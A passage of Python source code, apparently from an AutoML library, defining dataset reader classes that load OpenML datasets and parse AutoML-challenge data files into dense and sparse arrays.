self.data = np.array(self.data)
self.X = self.data[0:self.num_entries, 0:self.num_features] #np.array( .iloc
self.Y = self.data[0:self.num_entries, -1]
for i in range(self.X.shape[0]):
for j in range(self.X.shape[1]):
if self.X[i, j] == "?":
self.X[i, j] = np.nan
self.num_classes = len(np.unique(self.Y))
if (auto_convert):
self.convert(**kwargs)
class OpenMlReader(DataReader):
def __init__(self, dataset_id, is_classification = None, api_key=None):
import openml
self.openml = openml
self.num_entries = None
self.num_features = None
self.num_classes = None
self.dataset_id = dataset_id
if api_key:
openml.config.server = "https://www.openml.org/api/v1/xml"
openml.config.apikey = api_key
super(OpenMlReader, self).__init__("openml:" + str(dataset_id), is_classification)
def read(self, **kwargs):
"""
Read the data from given openml dataset file.
Arguments:
auto_convert: Automatically convert data after reading.
*args, **kwargs: arguments for converting.
"""
dataset = self.openml.datasets.get_dataset(self.dataset_id)
try:
self.X, self.Y, self.categorical_features = dataset.get_data(
target=dataset.default_target_attribute, return_categorical_indicator=True)
except Exception as e:
raise RuntimeError("An error occurred when loading the dataset and splitting it into X and Y. Please check if the dataset is suitable.")
self.num_entries = self.X.shape[0]
self.num_features = self.X.shape[1]
self.is_multilabel = False
class_labels = dataset.retrieve_class_labels(target_name=dataset.default_target_attribute)
if class_labels:
self.is_classification = True
self.num_classes = len(class_labels)
else:
self.is_classification = False
self.num_classes = 1
class AutoMlReader(DataReader):
def __init__(self, path_to_info):
self.num_entries = None
self.num_features = None
self.num_classes = None
super(AutoMlReader, self).__init__(path_to_info, None)
def read(self, auto_convert=True, **kwargs):
path_to_info = self.file_name
info_dict = dict()
# read info file
with open(path_to_info, "r") as f:
for line in f:
info_dict[line.split("=")[0].strip()] = line.split("=")[1].strip().strip("'")
self.is_classification = "classification" in info_dict["task"]
name = info_dict["name"]
path = os.path.dirname(path_to_info)
self.is_multilabel = "multilabel" in info_dict["task"] if self.is_classification else None
self.metric = info_dict["metric"]
self.max_runtime = float(info_dict["time_budget"])
target_num = int(info_dict["target_num"])
feat_num = int(info_dict["feat_num"])
train_num = int(info_dict["train_num"])
valid_num = int(info_dict["valid_num"])
test_num = int(info_dict["test_num"])
is_sparse = bool(int(info_dict["is_sparse"]))
feats_binary = info_dict["feat_type"].lower() == "binary"
# read feature types
force_categorical = []
force_numerical = []
if info_dict["feat_type"].lower() == "binary" or info_dict["feat_type"].lower() == "numerical":
force_numerical = [i for i in range(feat_num)]
elif info_dict["feat_type"].lower() == "categorical":
force_categorical = [i for i in range(feat_num)]
elif os.path.exists(os.path.join(path, name + "_feat.type")):
with open(os.path.join(path, name + "_feat.type"), "r") as f:
for i, line in enumerate(f):
if line.strip().lower() == "numerical":
force_numerical.append(i)
elif line.strip().lower() == "categorical":
force_categorical.append(i)
# read data files
reading_function = self.read_datafile if not is_sparse else (
self.read_sparse_datafile if not feats_binary else self.read_binary_sparse_datafile)
self.X = reading_function(os.path.join(path, name + "_train.data"), (train_num, feat_num))
self.Y = self.read_datafile(os.path.join(path, name + "_train.solution"), (train_num, target_num))
if os.path.exists(os.path.join(path, name + "_valid.data")) and \
os.path.exists(os.path.join(path, name + "_valid.solution")):
self.X_valid = reading_function(os.path.join(path, name + "_valid.data"), (valid_num, feat_num))
self.Y_valid = self.read_datafile(os.path.join(path, name + "_valid.solution"), (valid_num, target_num))
if os.path.exists(os.path.join(path, name + "_test.data")) and \
os.path.exists(os.path.join(path, name + "_test.solution")):
self.X_test = reading_function(os.path.join(path, name + "_test.data"), (test_num, feat_num))
self.Y_test = self.read_datafile(os.path.join(path, name + "_test.solution"), (test_num, target_num))
if not self.is_multilabel and self.is_classification and self.Y.shape[1] > 1:
self.Y = np.argmax(self.Y, axis=1)
self.Y_valid = np.argmax(self.Y_valid, axis=1) if self.Y_valid is not None else None
self.Y_test = np.argmax(self.Y_test, axis=1) if self.Y_test is not None else None
if auto_convert and not is_sparse:
self.convert(force_categorical=force_categorical, force_numerical=force_numerical, **kwargs)
def read_datafile(self, filepath, shape):
data = []
with open(filepath, "r") as f:
for line in f:
data.append([float(v.strip()) for v in line.split()])
return np.array(data)
def read_sparse_datafile(self, filepath, shape):
data = []
row_indizes = []
col_indizes = []
with open(filepath, "r") as f:
for row, line in enumerate(f):
print("\rReading line:", row, "of", shape[0], end="")
for value in line.split():
value = value.rstrip()
data.append(float(value.split(":")[1]))
col_indizes.append(int(value.split(":")[0]) - 1)
row_indizes.append(row)
print("Done")
return csr_matrix((data, (row_indizes, col_indizes)), shape=shape)
def read_binary_sparse_datafile(self, filepath, shape):
row_indizes = []
col_indizes = []
with open(filepath, "r") as f:
for row, line in enumerate(f):
print("\rReading line:", row, "of", shape[0], end="")
for value in line.split():
value = value.rstrip()
col_indizes.append(int(value) - 1)
row_indizes.append(row)
print("Done")
return csr_matrix(([1] * len(row_indizes), (row_indizes, col_indizes)), shape=shape)
| 41.294872
| 148
| 0.608093
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.